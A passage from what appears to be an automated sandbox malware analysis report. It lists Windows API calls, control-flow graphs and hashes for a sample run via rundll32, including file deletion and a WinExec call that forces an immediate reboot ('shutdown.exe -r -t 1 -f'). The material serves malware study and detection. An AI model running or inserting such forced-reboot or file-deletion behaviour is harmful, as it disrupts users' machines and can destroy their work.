                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04), ref: 046553A4
                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04), ref: 046553B3
                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 046553BB
                                                                              • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 046553D6
                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,048496AA,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 046553E4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                              • String ID:
                                                                              • API String ID: 2814369299-0
                                                                              • Opcode ID: 51581fa92d2b7a18b0aae32d03bdf7857640276727e65be97fcde1401e47a319
                                                                              • Instruction ID: b2888e8ce6db2587c1dd7ed65ec56f043381c6d1e4844acb172233ba77acf2b9
                                                                              • Opcode Fuzzy Hash: 51581fa92d2b7a18b0aae32d03bdf7857640276727e65be97fcde1401e47a319
                                                                              • Instruction Fuzzy Hash: EFF0EC623006453ABF2039BC0CC8B7E118CCDD256EF980739FD86C22E0F9567C074199
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 478 484991c-484995a Sleep WinExec Sleep
                                                                              APIs
                                                                              • Sleep.KERNEL32(00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?,00000000), ref: 04849932
                                                                              • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0484993E
                                                                              • Sleep.KERNEL32(0000012C,00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?), ref: 04849948
                                                                              Strings
                                                                              • C:\WINDOWS\system32\shutdown.exe -r -t 1 -f, xrefs: 04849939
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep$Exec
                                                                              • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                                                                              • API String ID: 1325486322-941748481
                                                                              • Opcode ID: f6f948c562ef47a37a12756c3d630dbbcd2951610d6d9cdcfcab639bac402a10
                                                                              • Instruction ID: cb0e2d6e420e567bf347f0858485c69641a9e5814e9bd4942469e4ef5176dcba
                                                                              • Opcode Fuzzy Hash: f6f948c562ef47a37a12756c3d630dbbcd2951610d6d9cdcfcab639bac402a10
                                                                              • Instruction Fuzzy Hash: 74D012717847447FF22766B55C22A167F4CD7C6F14F910864FA00D1A90E5A938108469
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 479 4639778-4639785 480 4639787 479->480 481 463978c-46397c0 GetCurrentThreadId 479->481 480->481 482 46397c2 481->482 483 46397c4-46397f0 call 463965c 481->483 482->483 486 46397f2-46397f4 483->486 487 46397f9-4639800 483->487 486->487 488 46397f6 486->488 489 4639802-4639805 487->489 490 463980a-4639810 487->490 488->487 489->490 491 4639812 490->491 492 4639815-463981c 490->492 491->492 493 463982b-463982f 492->493 494 463981e-4639825 492->494 495 4639835 call 463970c 493->495 496 4639ac4-4639ade 493->496 494->493 500 463983a 495->500 497 4639af1-4639af8 496->497 498 4639ae0-4639aec call 46399a4 call 4639a2c 496->498 502 4639b1b-4639b1f 497->502 503 4639afa-4639b05 GetCurrentThreadId 497->503 498->497 506 4639b21-4639b25 502->506 507 4639b39-4639b3d 502->507 503->502 505 4639b07-4639b16 call 463967c call 4639a00 503->505 505->502 506->507 512 4639b27-4639b37 506->512 508 4639b49-4639b4d 507->508 509 4639b3f-4639b42 507->509 514 4639b4f-4639b58 call 4636f34 508->514 515 4639b6c-4639b75 call 46396a4 508->515 509->508 513 4639b44-4639b46 509->513 512->507 513->508 514->515 526 4639b5a-4639b6a call 4637f28 call 4636f34 514->526 524 4639b77-4639b7a 515->524 525 4639b7c-4639b81 515->525 524->525 527 4639b9d-4639ba8 call 463967c 524->527 525->527 528 4639b83-4639b91 call 463d92c 525->528 526->515 537 4639baa 527->537 538 4639bad-4639bb1 527->538 528->527 536 4639b93-4639b95 528->536 536->527 540 4639b97-4639b98 FreeLibrary 536->540 537->538 541 4639bb3-4639bb5 call 4639a00 538->541 542 4639bba-4639bbd 538->542 540->527 541->542 543 4639bd6-4639be7 542->543 544 4639bbf-4639bc6 542->544 543->507 546 4639bc8 544->546 547 4639bce-4639bd1 ExitProcess 544->547 546->547
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 046397AF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentThread
                                                                              • String ID:
                                                                              • API String ID: 2882836952-0
                                                                              • Opcode ID: ec322403216a7eadecd0a81cbc04be0199c1173996e94c4acfde7761ce2670a0
                                                                              • Instruction ID: f1f0fa40695acda361d584b12d777f1ad7b13ef122344a0ddced72bc475c12b4
                                                                              • Opcode Fuzzy Hash: ec322403216a7eadecd0a81cbc04be0199c1173996e94c4acfde7761ce2670a0
                                                                              • Instruction Fuzzy Hash: 2F516EB0A00385DBEB24EF29C88475A77E4EB5931AF14499DE8068B341E7B4F889CF15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,0465525B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0472B1D8,?,?), ref: 046551C7
                                                                                • Part of subcall function 04653194: GetFileAttributesW.KERNEL32(00000000,00000000,?,00000001), ref: 046531E1
                                                                                • Part of subcall function 04653194: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,00000001), ref: 04653213
                                                                                • Part of subcall function 04653194: CloseHandle.KERNEL32(000000FF,0465325C,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,00000001), ref: 0465324F
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,0465525B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0472B1D8), ref: 04655223
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0465525B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0472B1D8), ref: 0465522C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$CloseCreateErrorHandleLast
                                                                              • String ID:
                                                                              • API String ID: 2006287432-0
                                                                              • Opcode ID: 48e52608f93afe3e13c6567d335e14990774f92d4857c0523878e8ddc8bd3769
                                                                              • Instruction ID: f624b19defef9fc1570228cc47ecc52553fe530b2f8f7359cdead54452e94c3c
                                                                              • Opcode Fuzzy Hash: 48e52608f93afe3e13c6567d335e14990774f92d4857c0523878e8ddc8bd3769
                                                                              • Instruction Fuzzy Hash: 5121B730600248BBEF10FBE4D889A9EB7B9DF85208F5144B99C41A3365FB34BE05CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 04818029
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04818040
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow
                                                                              • String ID:
                                                                              • API String ID: 1378638983-0
                                                                              • Opcode ID: 2a269c2fa989e2044dd54b48c92bc48d4c1d3d603d734d0489112b679d2296c0
                                                                              • Instruction ID: b2e2f82f6c75de33850c5a7e541ff3491450740e0d12ebcb0f2c3fa903ca18f3
                                                                              • Opcode Fuzzy Hash: 2a269c2fa989e2044dd54b48c92bc48d4c1d3d603d734d0489112b679d2296c0
                                                                              • Instruction Fuzzy Hash: F8418430A04248EFDB45EF68C885E9EB7F6EB49704F6149B9E814D7361D734AE40DB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,0463D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0463D786,00000000,?,00000105), ref: 0463D693
                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0463D6FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0463D786,00000000,?,00000105), ref: 0463D6BB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultLanguage$SystemUser
                                                                              • String ID:
                                                                              • API String ID: 384301227-0
                                                                              • Opcode ID: f69a4ac2a3c48f8fb5733c4f2e4c8d3fdf67d8d6564b16e67b0ba82dce8577b1
                                                                              • Instruction ID: 0f8d58ee0da841aeb7a5e87bc48806598959c7870db16d50c3f04847a4ad3061
                                                                              • Opcode Fuzzy Hash: f69a4ac2a3c48f8fb5733c4f2e4c8d3fdf67d8d6564b16e67b0ba82dce8577b1
                                                                              • Instruction Fuzzy Hash: 4E312B70B002899FEB10EFA8C881AAEB7B5EF4970AF504469D414A7350EBB4BD45CB55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D748
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D799
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName
                                                                              • String ID:
                                                                              • API String ID: 1159719554-0
                                                                              • Opcode ID: 13fe4fba9aa4e3057a3b49b23d0d8f39731d0b90b21c362c80baeb64950b2c4f
                                                                              • Instruction ID: 0a29f50de0e85a11710701d8a25acd9a6c847759d3af27642d34b81fdc719993
                                                                              • Opcode Fuzzy Hash: 13fe4fba9aa4e3057a3b49b23d0d8f39731d0b90b21c362c80baeb64950b2c4f
                                                                              • Instruction Fuzzy Hash: EE117770A4425CAFEB14EB90CC85BDD73B8DB44709F5144BAE508A3290FA706F859E99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: DrivesLogical
                                                                              • String ID:
                                                                              • API String ID: 999431828-0
                                                                              • Opcode ID: e7fbc9642cf121bdaa6b147a93a1cd5dc64ea300f9fb3c47fddf86f19132aa62
                                                                              • Instruction ID: 69e8472d1a2a83af07d14a7d57230a0f115a3c09f6aba70023ab40646f8b3a2d
                                                                              • Opcode Fuzzy Hash: e7fbc9642cf121bdaa6b147a93a1cd5dc64ea300f9fb3c47fddf86f19132aa62
                                                                              • Instruction Fuzzy Hash: 1CF0C2363040218BDB147E7D8D586A973C2DBC0365F09493AEAC1CB394D634BD86C205
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,04637D6A,?,?,?,00000000), ref: 04637D49
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CompareString
                                                                              • String ID:
                                                                              • API String ID: 1825529933-0
                                                                              • Opcode ID: f26618e6b1cee662629e4d0990345c972db9b634970784f732337fffcf5bda52
                                                                              • Instruction ID: b3a4c5fe9ebcbe0270cafbefc767f549f9b5b90b2f8a0e839371f9cf17b5d177
                                                                              • Opcode Fuzzy Hash: f26618e6b1cee662629e4d0990345c972db9b634970784f732337fffcf5bda52
                                                                              • Instruction Fuzzy Hash: FDF0FCB13046C47FEB11EB64CC91D5D73DCDF48606B510475F400D3250F6B57E04A614
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,00000000,?,046C21E0,046E5604,00000000,046E5684,?,?,046C21E0), ref: 04654A0F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 4bac73b08c1af8c863f6998c572e52e16be7ad392155c789269a80909799b2dd
                                                                              • Instruction ID: 07b42ad73adcd745a074de98b7fe0e85e93d0614c3dfd8e6833e7a94c230cb57
                                                                              • Opcode Fuzzy Hash: 4bac73b08c1af8c863f6998c572e52e16be7ad392155c789269a80909799b2dd
                                                                              • Instruction Fuzzy Hash: FEE092B2B401502EF76098ADACD1F0A914ECBA5B79F190635F614FF2C1E568AC0192A8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,046C21E0,046E5599,00000000,046E5684,?,?,046C21E0), ref: 04654A61
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 251f625c4975542e9150ef2aa80ec7609923eab4ab19a28241fce101d707fcc8
                                                                              • Instruction ID: 564327e394960e201c9b530e7e45afedf2a2845a73fd0f227892aed5f8809e94
                                                                              • Opcode Fuzzy Hash: 251f625c4975542e9150ef2aa80ec7609923eab4ab19a28241fce101d707fcc8
                                                                              • Instruction Fuzzy Hash: 0DE04FE3B105242AF760A9ED9CC1F6B914DCB916BAF0A0635FB51EB2C0D559EC0182E8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(04630000,?,0000020A), ref: 0463C4B6
                                                                                • Part of subcall function 0463D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D748
                                                                                • Part of subcall function 0463D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0463D7C6,?,04630000,04858C1C), ref: 0463D799
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName$LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 4113206344-0
                                                                              • Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
